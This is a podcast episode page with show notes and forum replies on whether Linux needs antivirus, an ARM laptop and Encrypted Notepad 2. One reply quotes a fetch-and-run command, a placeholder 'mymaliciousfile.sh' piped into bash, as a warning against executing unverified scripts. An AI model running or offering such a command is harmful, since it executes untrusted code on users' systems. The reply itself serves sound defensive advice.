374: Kaspersky for Linux but Do We Really Need Antivirus? Truth Revealed!

Download as MP3

Sponsored by LINBIT: Visit destinationlinux.net/linbit to learn how LINBIT’s OSS, based on DRBD® and LINSTOR®, can be used for Kubernetes, CloudStack, OpenNebula, and more.

Support the show by becoming a patron at tuxdigital.com/membership or get some swag at tuxdigital.com/store

Hosted by:

Michael Tunnell = michaeltunnell.com
Ryan DasGeek = dasgeek.net
Jill Bryant = jilllinuxgirl.com

Chapters:

00:00:00 Intro
00:00:47 Community Feedback
00:10:47 Sponsored by LINBIT
00:12:06 Antivirus on Linux, do we need it?
00:31:28 Linux is getting an ARM laptop too
00:49:15 Gaming: Containment Zone
00:52:15 Software Spotlight: Encrypted Notepad 2
00:56:46 Tip of the Week: R, RStudio & officerR for powerpoint files
01:09:01 Outro

Links:

Encrypted Notepad instructions:

  • First make sure the Go 1.22+ library is installed.
  • Then run the following commands from terminal:
git clone https://github.com/ivoras/EncryptedNotepad2.git
cd EncryptedNotepad2
go build
./EncryptedNotepad2

Leave a Comment

Notable Replies

  1. @grantorinowhiskey thanks for the comment, I did miss that part of their README . . . it really shouldnt be that far down the page. lol

    I think it is totally fine to want to make money from open source software, the presentation needs a lot of improvement though. As a marketer, I would recommend they make a website for this app, put a big buy now button somewhere at the top portion of the website and also mention that source code is available. This is doing the reverse with having it on GitHub. Being on GitHub the first expectation is source code and since so many people are expecting to compile when seeing from GitHub that is somewhat pre-suggestive.

  2. For the tip of the week, you guys were talking about using gdebi to install locally downloaded debs. FYI, apt already has the ability to install local debs:

    apt install /path/to/the/deb

  3. You’re right but in my opinion, something as simple of installing an application shouldn’t require a terminal

  4. While it’s true that it’s generally harder to catch a virus :microbe: on Linux by negligently clicking on downloaded files, there are still ways for attackers to target a user’s negligence. A common example is

    curl example.com/mymaliciousfile.sh | bash
    

    Piping downloaded shell files into bash is the Linux developer equivalent to clicking on a downloaded .exe on Windows. Don’t do this. Download the file first onto your disk and have a look into, compare checksums and execute it when it looks fine.

    Another common attack surface are unregulated package repositories, such as npm or pip. Here, a typo or a wrong name could result in installing a virus. I myself have installed the wrong packages several times because I remembered the package name wrongly or because it wasn’t available in pypi (luckily, those wrong packages weren’t malicious).

    Sure, on Linux, you still have the user/admin separation by default, which introduces basic security, but this won’t stop all malicious code. Ransomware doesn’t need admin privileges to encrypt your precious files.

Continue the discussion at forum.tuxdigital.com

2 more replies

Participants

Avatar for vogelsaurier Avatar for MichaelTunnell Avatar for grantorinowhiskey Avatar for LinuxUser